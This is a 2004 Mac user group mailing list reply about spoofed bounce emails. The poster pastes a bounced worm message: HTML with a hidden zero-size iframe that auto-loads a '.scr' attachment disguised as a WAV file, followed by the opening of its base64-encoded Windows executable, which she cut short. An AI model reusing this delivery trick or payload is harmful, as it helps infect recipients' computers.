[muglo] Re: Suspicious email activity
- From: Regina Satorius <regina@xxxxxxxxxxx>
- To: Muglo <muglo@xxxxxxxxxxxxx>
- Date: Wed, 10 Nov 2004 15:01:44 -0500
on 11/9/04 6:59 PM, Eric D at hideme666@xxxxxxxxxxx wrote:
> Can you please send me a copy of said "spammer/spoofer" virus?
>
> I haven't read the first few messages of this thread yet but it sounds like
> a typical spammer/virus on that's operating on ANOTHER computer. What
> happens is that your e-mail address is used as a fake "From" address by
> either a spammer or by a virus that has infected a WINDOWS user's computer
> (NOT Macintosh... it'd be neat if it was a Mac though) and is sending out
> e-mails that get bounced. And, when they get bounced they are sent to the
> from/reply-to address which is your address.
>
> I have addressed this before on this mailing list as have others and am
> feeling like a bit of a broken record. To date NO computer viruses (NOT
> viri) are known to on Mac OS X.
>
> Eric.
>
Eric, I don't get a lot of these, but here is the front portion of a recent
strange, very long message that supposedly "bounced" back to me but I didn't
send it:
It came from: <MAILER-DAEMON@xxxxxxxxxxxxxxxxxxxx>
Subject was: failure notice
Hi. This is the qmail-send program at smtp4.tidc.telus.com.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.
<harveym@xxxxxxxxxxxxx>:
Sorry, I wasn't able to establish an SMTP connection. (#4.4.1)
I'm not going to try again; this message has been in the queue too long.
--- Below this line is a copy of the message.
Return-Path: <regina@xxxxxxxxxxx>
Received: (qmail 3973 invoked from network); 8 Nov 2004 14:56:19 -0000
Received: from pc-207-239.scpe.quickclic.net (HELO castle-ed.com)
(24.244.207.239)
by relay.tidc.telus.com with SMTP; 8 Nov 2004 14:56:19 -0000
From: regina@xxxxxxxxxxx
To: harveym@xxxxxxxxxxxxx
Subject: Mail Delivery (failure harveym@xxxxxxxxxxxxx)
Date: Mon, 8 Nov 2004 09:56:39 -0500
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="----=_NextPart_000_001B_01C0CA80.6B015D10"
X-Priority: 3
X-MSMail-Priority: Normal
This is a multi-part message in MIME format.
------=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_001C_01C0CA80.6B015D10"
------=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
------=_NextPart_001_001C_01C0CA80.6B015D10
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2920.0" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>If the message will not displayed automatically,<br>
follow the link to read the delivered message.<br><br>
Received message is available at:<br>
<a href=3Dcid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=3D0
width=3D0>www.castle-ed.com/inbox/harveym/read.php?sessionid-27930</a>
<iframe
src=3Dcid:031401Mfdab4$3f3dL780$73387018@57W81fa70Re height=3D0
width=3D0></iframe>
<DIV> </DIV></BODY></HTML>
------=_NextPart_001_001C_01C0CA80.6B015D10--
------=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: audio/x-wav;
name="message.scr"
Content-Transfer-Encoding: base64
Content-ID:<031401Mfdab4$3f3dL780$73387018@57W81fa70Re>
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAYAAAAA4fug4AtAnNIbgBTM0hV2luZG93cyBQcm9ncmFtDQokUEUAAEwBAwAAAAAA
AAAAAAAAAADgAA8BCwEAAAAEAAAAcgAAAAAAAAAgAQAAEAAAACAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAAMAEAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAAD0IAEAawAAAACwAABobQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdAAAAACgAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAA
AADgAADAAAAAAHRhAAAAcAAAALAAAHRvAAAABAAAAAAAAAAAAAAAAAAA4AAAwAAAAABhAAAA
ABAAAAAgAQAAAgAAAAIAAAAAAAAAAAAAAAAAAOAAAMAFBAYEAQDOIUAAAgAAQAAAAG4AAAAM
AAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAC70AFAAL8AEEAAviwcQQBT6AoAAAAC0nUFihZG
EtLD/LKApGoCW/8UJHP3M8n/FCRzGDPA/xQkcyGzAkGwEP8UJBLAc/l1P6rr3OhDAAAAK8t1
EOg4AAAA6yis0eh0QRPJ6xyRSMHgCKzoIgAAAD0AfQAAcwqA/AVzBoP4f3cCQUGVi8WzAVaL
9yvw86Re65YzyUH/VCQEE8n/VCQEcvTDX1sPtztPdAhPdBPB5wzrB4t7AleDwwRDQ+lR////
X7soIUEAR4s3r1f/E5UzwK51/f4PdO/+D3UGR/83r+sJ/g8PhKLw/v9XVf9TBAkGrXXbi+zD
HCEBAAAAAAAAAAAANCEBACghAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEAhAQBOIQEAAAAAAEAh
AQBOIQEAAAAAAEtFUk5FTDMyLmRsbAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwDr
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAEAAgAYAQCAKAAAgAMAAABAAACADgAAAGAAAIAAAAAAAAAAAAAAAAAAAAEA
ZQAAAHgAAIAAAAAAAAAAAAAAAAAAAAIAAQAAAJAAAIACAAAAqAAAgAAAAAAAAAAAAAAAAAEA
AAAmAQCAwAAAgAAAAAAAAAAAAAAAAAAAAQAHBAAA2AAAAAAAAAAAAAAAAAAAAAAAAQAHBAAA
6AAAAAAAAAAAAAAAAAAAAAAAAQAHBAAA+AAAAAAAAAAAAAAAAAAAAAAAAQAHBAAACAEAADCx
....and a whole lot more garbage I deleted.
_________________________________________________
For information concerning the MUGLO List just click on
http://muglo.on.ca/Pages/joinus.html
Our Archives can be viewed at
//www.freelists.org/archives/muglo
Don't forget to periodically check our web site at:
http://muglo.on.ca/
Other related posts:
